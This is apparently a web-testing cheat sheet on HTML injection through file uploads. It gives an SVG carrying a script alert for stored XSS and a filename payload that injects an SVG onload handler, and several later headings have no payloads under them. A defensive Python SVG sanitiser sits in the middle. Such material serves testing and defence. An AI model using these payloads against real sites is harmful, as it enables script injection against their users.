💉File Upload HTML Injection
Stored XSS through SVG
When loaded, the SVG file below triggers the XSS payload marked with asterisks. Any SVG file can contain JavaScript code, but it only executes when the SVG is accessed directly, either by writing it into the page or by visiting the SVG file's URL. Embedding it in, e.g., an img tag will not work.
<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">
<circle cx="50" cy="50" r="48" fill="none" stroke="#000"/>
<path d="M50,2a48,48 0 1 1 0,96a24 24 0 1 1 0-48a24 24 0 1 0 0-48"/>
<circle cx="50" cy="26" r="6"/>
<circle cx="50" cy="74" r="6" fill="#FFF"/>
***<script>alert("XSS through SVG");</script>***
</svg>
----------------------------------------------------------------
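A server-side check for the stored-XSS case described above, as an added example that is not part of the original page: it parses an uploaded SVG and reports script-capable content (script elements, on* event handlers, javascript: URLs). The function names, the deny-list and the sample files are assumptions made for illustration.

```python
import xml.etree.ElementTree as ET

SVG_NS = "http://www.w3.org/2000/svg"
ACTIVE_ELEMENTS = {"script", "foreignObject", "iframe", "embed", "object"}

# Constructed samples: a harmless image and a shortened form of the SVG shown above.
BENIGN = b'<svg xmlns="http://www.w3.org/2000/svg"><circle cx="50" cy="50" r="48"/></svg>'
SCRIPTED = (b'<svg xmlns="http://www.w3.org/2000/svg" viewBox="0 0 100 100">'
            b'<circle cx="50" cy="26" r="6"/>'
            b'<script>alert("XSS through SVG");</script></svg>')

def local(name: str) -> str:
    """Strip the '{namespace}' prefix ElementTree puts on tag and attribute names."""
    return name.rsplit("}", 1)[-1]

def svg_findings(data: bytes) -> list[str]:
    """Return reasons to reject an uploaded SVG; an empty list means none were found."""
    # NUL bytes indicate UTF-16/32, which would hide markup from the byte checks below.
    if b"\x00" in data:
        return ["not UTF-8/ASCII encoded"]
    # Refuse DTDs before parsing: uploads do not need them and they enable entity tricks.
    if b"<!DOCTYPE" in data or b"<!ENTITY" in data:
        return ["DTD or entity declaration present"]
    try:
        root = ET.fromstring(data)
    except ET.ParseError as exc:
        return [f"not well-formed XML: {exc}"]
    findings = []
    if root.tag != f"{{{SVG_NS}}}svg":
        findings.append("root element is not <svg> in the SVG namespace")
    for el in root.iter():
        tag = local(el.tag)
        if tag in ACTIVE_ELEMENTS:
            findings.append(f"active element <{tag}>")
        for attr, value in el.attrib.items():
            name = local(attr).lower()
            # Browsers ignore whitespace inside a URL scheme, so drop it before matching.
            compact = "".join(value.split()).lower()
            if name.startswith("on"):
                findings.append(f"event handler attribute {name} on <{tag}>")
            elif name == "href" and compact.startswith("javascript:"):
                findings.append(f"javascript: URL in href on <{tag}>")
    return findings

if __name__ == "__main__":
    for label, sample in (("benign", BENIGN), ("scripted", SCRIPTED)):
        print(label, svg_findings(sample) or "no findings")
```

A deny-list like this is one layer only; serving uploads with `Content-Disposition: attachment` or from a separate origin keeps a missed script from running in the application's origin.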
File Upload HTML Injection – Filename
Use when the uploaded filename is reflected somewhere on the target page. It usually leads to Self XSS scenarios though.
--------------------------------------------------------------------
"><svg onload=alert(1)>.gif
------------------------------------------------------------------------------------------------------------------------------------
File Upload HTML Injection – Metadata
Use when metadata of the uploaded file is reflected somewhere on the target page. It uses command-line exiftool (“$” is the terminal prompt) and any metadata field can be set.
----------------------------------------------------------------
File Upload Injection – SVG File
Use to create a stored XSS on target when uploading image files. Save the content below as “xss.svg”.
----------------------------------------------------------------
XSS in SVG
----------------------------------------------------------------
XSS in SVG (short)